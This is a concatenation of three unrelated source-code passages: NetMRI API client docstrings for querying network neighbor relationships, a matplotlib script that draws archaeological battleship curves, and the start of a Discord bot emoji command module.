:param val_f_NeighborDeviceID: If op_NeighborDeviceID is specified, the field named in this input will be compared to the value in NeighborDeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborDeviceID must be specified if op_NeighborDeviceID is specified.
:type val_f_NeighborDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborDeviceID: If op_NeighborDeviceID is specified, this value will be compared to the value in NeighborDeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborDeviceID must be specified if op_NeighborDeviceID is specified.
:type val_c_NeighborDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborEndTime: The operator to apply to the field NeighborEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborEndTime: The ending effective time of this revision of this record, or empty if still in effect. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborEndTime: If op_NeighborEndTime is specified, the field named in this input will be compared to the value in NeighborEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborEndTime must be specified if op_NeighborEndTime is specified.
:type val_f_NeighborEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborEndTime: If op_NeighborEndTime is specified, this value will be compared to the value in NeighborEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborEndTime must be specified if op_NeighborEndTime is specified.
:type val_c_NeighborEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborFirstSeenTime: The operator to apply to the field NeighborFirstSeenTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborFirstSeenTime: The date and time this neighbor was first seen on the network, and since which it has been continuously present. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborFirstSeenTime: If op_NeighborFirstSeenTime is specified, the field named in this input will be compared to the value in NeighborFirstSeenTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborFirstSeenTime must be specified if op_NeighborFirstSeenTime is specified.
:type val_f_NeighborFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborFirstSeenTime: If op_NeighborFirstSeenTime is specified, this value will be compared to the value in NeighborFirstSeenTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborFirstSeenTime must be specified if op_NeighborFirstSeenTime is specified.
:type val_c_NeighborFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborID: The operator to apply to the field NeighborID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborID: The internal NetMRI identifier for this neighbor relationship. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborID: If op_NeighborID is specified, the field named in this input will be compared to the value in NeighborID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborID must be specified if op_NeighborID is specified.
:type val_f_NeighborID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborID: If op_NeighborID is specified, this value will be compared to the value in NeighborID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborID must be specified if op_NeighborID is specified.
:type val_c_NeighborID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborIfIndex: The operator to apply to the field NeighborIfIndex. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborIfIndex: The SNMP interface index of the destination device interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborIfIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborIfIndex: If op_NeighborIfIndex is specified, the field named in this input will be compared to the value in NeighborIfIndex using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborIfIndex must be specified if op_NeighborIfIndex is specified.
:type val_f_NeighborIfIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborIfIndex: If op_NeighborIfIndex is specified, this value will be compared to the value in NeighborIfIndex using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborIfIndex must be specified if op_NeighborIfIndex is specified.
:type val_c_NeighborIfIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborInterfaceID: The operator to apply to the field NeighborInterfaceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborInterfaceID: The internal NetMRI identifier for the destination interface in this neighbor relationship. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborInterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborInterfaceID: If op_NeighborInterfaceID is specified, the field named in this input will be compared to the value in NeighborInterfaceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborInterfaceID must be specified if op_NeighborInterfaceID is specified.
:type val_f_NeighborInterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborInterfaceID: If op_NeighborInterfaceID is specified, this value will be compared to the value in NeighborInterfaceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborInterfaceID must be specified if op_NeighborInterfaceID is specified.
:type val_c_NeighborInterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborNetworkDeviceInd: The operator to apply to the field NeighborNetworkDeviceInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborNetworkDeviceInd: A flag indicating if the destination device is a network device or an end host. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborNetworkDeviceInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborNetworkDeviceInd: If op_NeighborNetworkDeviceInd is specified, the field named in this input will be compared to the value in NeighborNetworkDeviceInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborNetworkDeviceInd must be specified if op_NeighborNetworkDeviceInd is specified.
:type val_f_NeighborNetworkDeviceInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborNetworkDeviceInd: If op_NeighborNetworkDeviceInd is specified, this value will be compared to the value in NeighborNetworkDeviceInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborNetworkDeviceInd must be specified if op_NeighborNetworkDeviceInd is specified.
:type val_c_NeighborNetworkDeviceInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborStartTime: The operator to apply to the field NeighborStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborStartTime: The starting effective time of this revision of the record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborStartTime: If op_NeighborStartTime is specified, the field named in this input will be compared to the value in NeighborStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborStartTime must be specified if op_NeighborStartTime is specified.
:type val_f_NeighborStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborStartTime: If op_NeighborStartTime is specified, this value will be compared to the value in NeighborStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborStartTime must be specified if op_NeighborStartTime is specified.
:type val_c_NeighborStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborTimestamp: The operator to apply to the field NeighborTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborTimestamp: The date and time this record was collected or calculated. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborTimestamp: If op_NeighborTimestamp is specified, the field named in this input will be compared to the value in NeighborTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborTimestamp must be specified if op_NeighborTimestamp is specified.
:type val_f_NeighborTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborTimestamp: If op_NeighborTimestamp is specified, this value will be compared to the value in NeighborTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborTimestamp must be specified if op_NeighborTimestamp is specified.
:type val_c_NeighborTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NetworkDeviceInd: The operator to apply to the field NetworkDeviceInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NetworkDeviceInd: A flag indicating if the source device is a network device or an end host. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NetworkDeviceInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NetworkDeviceInd: If op_NetworkDeviceInd is specified, the field named in this input will be compared to the value in NetworkDeviceInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NetworkDeviceInd must be specified if op_NetworkDeviceInd is specified.
:type val_f_NetworkDeviceInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NetworkDeviceInd: If op_NetworkDeviceInd is specified, this value will be compared to the value in NetworkDeviceInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NetworkDeviceInd must be specified if op_NetworkDeviceInd is specified.
:type val_c_NetworkDeviceInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_OSPFRoutedInd: The operator to apply to the field OSPFRoutedInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. OSPFRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon an OSPF route. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_OSPFRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_OSPFRoutedInd: If op_OSPFRoutedInd is specified, the field named in this input will be compared to the value in OSPFRoutedInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_OSPFRoutedInd must be specified if op_OSPFRoutedInd is specified.
:type val_f_OSPFRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_OSPFRoutedInd: If op_OSPFRoutedInd is specified, this value will be compared to the value in OSPFRoutedInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_OSPFRoutedInd must be specified if op_OSPFRoutedInd is specified.
:type val_c_OSPFRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ProtoRoutedInd: The operator to apply to the field ProtoRoutedInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ProtoRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a dynamic protocol defined route. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ProtoRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ProtoRoutedInd: If op_ProtoRoutedInd is specified, the field named in this input will be compared to the value in ProtoRoutedInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ProtoRoutedInd must be specified if op_ProtoRoutedInd is specified.
:type val_f_ProtoRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ProtoRoutedInd: If op_ProtoRoutedInd is specified, this value will be compared to the value in ProtoRoutedInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ProtoRoutedInd must be specified if op_ProtoRoutedInd is specified.
:type val_c_ProtoRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RevSwitchFwdInd: The operator to apply to the field RevSwitchFwdInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RevSwitchFwdInd: A flag indicating that this neighbor relationship was derived by reversing a switch forwarding neighbor relationship. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_RevSwitchFwdInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RevSwitchFwdInd: If op_RevSwitchFwdInd is specified, the field named in this input will be compared to the value in RevSwitchFwdInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RevSwitchFwdInd must be specified if op_RevSwitchFwdInd is specified.
:type val_f_RevSwitchFwdInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RevSwitchFwdInd: If op_RevSwitchFwdInd is specified, this value will be compared to the value in RevSwitchFwdInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RevSwitchFwdInd must be specified if op_RevSwitchFwdInd is specified.
:type val_c_RevSwitchFwdInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_SerialInd: The operator to apply to the field SerialInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. SerialInd: A flag indicating that this neighbor relationship was derived using the NetMRI point-to-point neighbor detection algorithm. Despite the name this may include point-to-point relationships on interfaces other than serial interfaces. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_SerialInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_SerialInd: If op_SerialInd is specified, the field named in this input will be compared to the value in SerialInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_SerialInd must be specified if op_SerialInd is specified.
:type val_f_SerialInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_SerialInd: If op_SerialInd is specified, this value will be compared to the value in SerialInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_SerialInd must be specified if op_SerialInd is specified.
:type val_c_SerialInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StaticRoutedInd: The operator to apply to the field StaticRoutedInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StaticRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a static route. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StaticRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StaticRoutedInd: If op_StaticRoutedInd is specified, the field named in this input will be compared to the value in StaticRoutedInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StaticRoutedInd must be specified if op_StaticRoutedInd is specified.
:type val_f_StaticRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StaticRoutedInd: If op_StaticRoutedInd is specified, this value will be compared to the value in StaticRoutedInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StaticRoutedInd must be specified if op_StaticRoutedInd is specified.
:type val_c_StaticRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_SwitchFwdInd: The operator to apply to the field SwitchFwdInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. SwitchFwdInd: A flag indicating that this neighbor relationship was derived using the NetMRI switch forwarding neighbor detection algorithm. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_SwitchFwdInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_SwitchFwdInd: If op_SwitchFwdInd is specified, the field named in this input will be compared to the value in SwitchFwdInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_SwitchFwdInd must be specified if op_SwitchFwdInd is specified.
:type val_f_SwitchFwdInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_SwitchFwdInd: If op_SwitchFwdInd is specified, this value will be compared to the value in SwitchFwdInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_SwitchFwdInd must be specified if op_SwitchFwdInd is specified.
:type val_c_SwitchFwdInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ifIndex: The operator to apply to the field ifIndex. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ifIndex: The SNMP interface index of the source device interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ifIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ifIndex: If op_ifIndex is specified, the field named in this input will be compared to the value in ifIndex using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ifIndex must be specified if op_ifIndex is specified.
:type val_f_ifIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ifIndex: If op_ifIndex is specified, this value will be compared to the value in ifIndex using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ifIndex must be specified if op_ifIndex is specified.
:type val_c_ifIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_network_id: The operator to apply to the field network_id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. network_id: The Network View ID assigned to this neighbor relationship. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_network_id: If op_network_id is specified, the field named in this input will be compared to the value in network_id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_network_id must be specified if op_network_id is specified.
:type val_f_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_network_id: If op_network_id is specified, this value will be compared to the value in network_id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_network_id must be specified if op_network_id is specified.
:type val_c_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the neighbors as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of neighbor methods. The listed methods will be called on each neighbor returned and included in the output. Available methods are: network_id, device, interface, neighbor_device, neighbor_interface, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device, interface, neighbor_device, neighbor_interface.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` NeighborID
:param sort: The data field(s) to use for sorting the output. Default is NeighborID. Valid values are DataSourceID, NeighborID, DeviceID, InterfaceID, ifIndex, NeighborDeviceID, NeighborInterfaceID, NeighborIfIndex, NeighborFirstSeenTime, NeighborStartTime, NeighborEndTime, NeighborChangedCols, NeighborTimestamp, CombinedInd, CDPInd, LLDPInd, SerialInd, SwitchFwdInd, RevSwitchFwdInd, DirectEthernetInd, IPRoutedInd, StaticRoutedInd, LocalRoutedInd, ProtoRoutedInd, BGPRoutedInd, OSPFRoutedInd, IGRPRoutedInd, NetworkDeviceInd, NeighborNetworkDeviceInd, CDPNeighborID, LLDPNeighborID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each Neighbor. Valid values are DataSourceID, NeighborID, DeviceID, InterfaceID, ifIndex, NeighborDeviceID, NeighborInterfaceID, NeighborIfIndex, NeighborFirstSeenTime, NeighborStartTime, NeighborEndTime, NeighborChangedCols, NeighborTimestamp, CombinedInd, CDPInd, LLDPInd, SerialInd, SwitchFwdInd, RevSwitchFwdInd, DirectEthernetInd, IPRoutedInd, StaticRoutedInd, LocalRoutedInd, ProtoRoutedInd, BGPRoutedInd, OSPFRoutedInd, IGRPRoutedInd, NetworkDeviceInd, NeighborNetworkDeviceInd, CDPNeighborID, LLDPNeighborID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return neighbors: An array of the Neighbor objects that match the specified input criteria.
:rtype neighbors: Array of Neighbor
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def interface(self, **kwargs):
"""The source interface in this neighbor relationship.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param NeighborID: The internal NetMRI identifier for this neighbor relationship.
:type NeighborID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The source interface in this neighbor relationship.
:rtype : Interface
"""
return self.api_request(self._get_method_fullname("interface"), kwargs)
def neighbor_device(self, **kwargs):
"""The destination device in this neighbor relationship.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param NeighborID: The internal NetMRI identifier for this neighbor relationship.
:type NeighborID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The destination device in this neighbor relationship.
:rtype : Device
"""
return self.api_request(self._get_method_fullname("neighbor_device"), kwargs)
def neighbor_interface(self, **kwargs):
"""The destination interface in this neighbor relationship.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param NeighborID: The internal NetMRI identifier for this neighbor relationship.
:type NeighborID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The destination interface in this neighbor relationship.
:rtype : Interface
"""
return self.api_request(self._get_method_fullname("neighbor_interface"), kwargs)
def infradevice(self, **kwargs):
"""The source device in this neighbor relationship.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param NeighborID: The internal NetMRI identifier for this neighbor relationship.
:type NeighborID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The source device in this neighbor relationship.
:rtype : InfraDevice
"""
return self.api_request(self._get_method_fullname("infradevice"), kwargs)
def network_id(self, **kwargs):
"""The Network View ID assigned to this neighbor relationship.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param NeighborID: The internal NetMRI identifier for this neighbor relationship.
:type NeighborID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The Network View ID assigned to this neighbor relationship.
:rtype : Integer
"""
return self.api_request(self._get_method_fullname("network_id"), kwargs)
def device(self, **kwargs):
"""The source device in this neighbor relationship.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param NeighborID: The internal NetMRI identifier for this neighbor relationship.
:type NeighborID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The source device in this neighbor relationship.
:rtype : Device
"""
return self.api_request(self._get_method_fullname("device"), kwargs)
|
"""
<NAME>
License: MIT
This is a simple script for creating battleship curves
that I created for an archaeology class project.
"""
from matplotlib.pyplot import *
from numpy import *
#################### Data ######################
#Plug your values into here
start_year = 1910
year_increment = 20
data = ["flowers", [0, 2, 5, 7, 5],
"crosses", [3, 4, 2, 1, 0],
"angel", [0, 2, 7, 5, 2],
"star of david", [0, 0, 2, 2, 1]]
filename = 'example.png'
################## Formating ###################
percentage_markers = True
border_color = 'black'
fill_color = 'black'
height = 0.9
show_y_ticks = False
preview_only = False
################################################
labels = [data[i] for i in range(len(data)) if i%2 == 0]
numbers = [data[i] for i in range(len(data)) if i%2 == 1]
n_sets = len(numbers)
set_length = len(numbers[0])
years = arange(start_year, start_year+year_increment*set_length, year_increment)
year_labels = ["{}-{}".format(y, y+year_increment) for y in years]
#check for errors in the data
bad_sets = ""
for i in range(n_sets):
if set_length != len(numbers[i]):
bad_sets += "data set #{}: {}\n".format(i+1, labels[i])
assert not bad_sets, "\nwrong number of elements for the following data sets:\n{}".format(bad_sets)
def tot(n, i):
sum = 0
for j in n:
sum += j[i]
return sum
total = [tot(numbers, i) for i in range(set_length)]
percentages = [[ns[i]*1.0/total[i] for i in range(set_length)] for ns in numbers]
f, axs = subplots(1, n_sets, sharex=True, sharey=True)
for i in range(n_sets):
ax = axs[i]
axs[i].set_title(labels[i])
rects = ax.barh(arange(set_length), percentages[i],
height, [-x/2.0 for x in percentages[i]],
tick_label=year_labels, align='center', color=fill_color, edgecolor=border_color)
if percentage_markers:
for j in range(len(rects)):
rect = rects[j]
percent_string = "{:.0f}%".format(100.0*percentages[i][j])
t = ax.text(0, 0, percent_string,
verticalalignment='center', weight='bold',
clip_on=True)
bb = t.get_window_extent(renderer=f.canvas.get_renderer())
bb_coords = bb.transformed(axs[i].transData.inverted())
if (rect.get_width() > bb_coords.width+0.025):
x = rect.get_x() + rect.get_width()/2.0
clr = 'white'
align = 'center'
else:
x = rect.get_x()+rect.get_width()+0.025
clr = 'black'
align = 'left'
y = rect.get_y() + rect.get_height()/2.0
t.set_color(clr)
t._x = x
t._y = y
t._horizontalalignment = align
axs[0].tick_params(
axis='y',
which='both',
right='off')
f.subplots_adjust(wspace=0)
setp([a.get_xticklabels() for a in f.axes], visible=False)
for ax in axs:
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.spines['bottom'].set_visible(False)
ax.tick_params(
axis='x',
which='both',
top='off',
bottom='off')
ax.spines['left'].set_visible(False)
for ax in axs[1 if show_y_ticks else 0:]:
ax.tick_params(
axis='y',
which='both',
left='off',
right='off',
labelbottom='off')
if preview_only:
show()
else:
savefig(filename)
|
"""
Copyright 2021 Nirlep_5252_
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import discord
from discord.ext import commands
from typing import Union, Optional
from utils.embed import error_embed, success_embed
from config import EMOJIS, MAIN_COLOR, SUPPORT_SERVER_LINK
from utils.bot import EpicBot
from utils.ui import Confirm, Paginator, PaginatorText
from utils.converters import Lower
from utils.flags import StickerFlags
from io import BytesIO
class emojis(commands.Cog, description="Emoji related commands!"):
def __init__(self, client: EpicBot):
self.client = client
@commands.cooldown(2, 10, commands.BucketType.user)
@commands.command(help="Enlarge an emoji.")
